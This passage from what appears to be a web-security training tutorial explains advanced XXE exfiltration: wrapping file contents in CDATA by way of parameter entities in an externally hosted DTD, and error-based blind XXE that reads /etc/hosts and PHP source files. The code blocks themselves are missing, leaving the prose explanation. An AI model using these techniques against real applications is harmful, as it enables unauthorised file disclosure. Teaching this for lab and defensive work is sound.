Advanced Exfiltration with CDATA
For PHP web apps, we can use PHP filters to encode and read source files.
But what about other types of Web Apps?
To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA
tag (e.g. <![CDATA[ FILE_CONTENT ]]>
).
This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.
After that, if we reference the &joined;
entity, it should contain our escaped data. However, this will not work, since XML prevents joining internal and external entities
, so we will have to find a better way to do so.
To bypass this limitation, we can utilize XML Parameter Entities
, a special type of entity that starts with a %
character and can only be used within the DTD. What’s unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:
So, let’s try to read the submitDetails.php
file by first storing the above line in a DTD file (e.g. xxe.dtd
), host it on our machine, and then reference it as an external entity on the target web application, as follows:
Now, we can reference our external entity (xxe.dtd
) and then print the &joined;
entity we defined above, which should contain the content of the submitDetails.php
file, as follows:
Once we write our xxe.dtd
file, host it on our machine, and then add the above lines to our HTTP request to the vulnerable web application, we can finally get the content of the submitDetails.php
file:
Error Based XXE
If the web app is not writing any output, we would be blind to XXE.
If the web application displays runtime errors (e.g., PHP errors) and does not have proper exception handling for the XML input, then we can use this flaw to read the output of the XXE exploit.
Let’s say none of the XML input entity is displayed on the screen.
We first try sending malformed XML data and see if the web app displays any errors.
To do so, we can try deleting any of the closing tags, change one of them, so it does not close (e.g. <roo>
).
When doing that, we see an error from the web app, which revealed the web server directory that we can use to read the source code of other files.
Let’s exploit this flaw and read file content.
We will first host a DTD file that contains the following payload:
The above payload defines the file
parameter entity and then joins it with an entity that does not exist. In our previous exercise, we were joining three strings. In this case, %nonExistingEntity;
does not exist, so the web application would throw an error saying that this entity does not exist, along with our joined %file;
as part of the error. There are many other variables that can cause an error, like a bad URI or having bad characters in the referenced file.
Now, we can call our external DTD script, and then reference the error
entity, as follows:
Once we host our DTD script as we did earlier and send the above payload as our XML data (no need to include any other XML data), we will get the content of the /etc/hosts
file as follows:
This method may also be used to read the source code of files. All we have to do is change the file name in our DTD script to point to the file we want to read (e.g. "file:///var/www/html/submitDetails.php"
). However, this method is not as reliable as the previous method for reading source files
, as it may have length limitations, and certain special characters may still break it.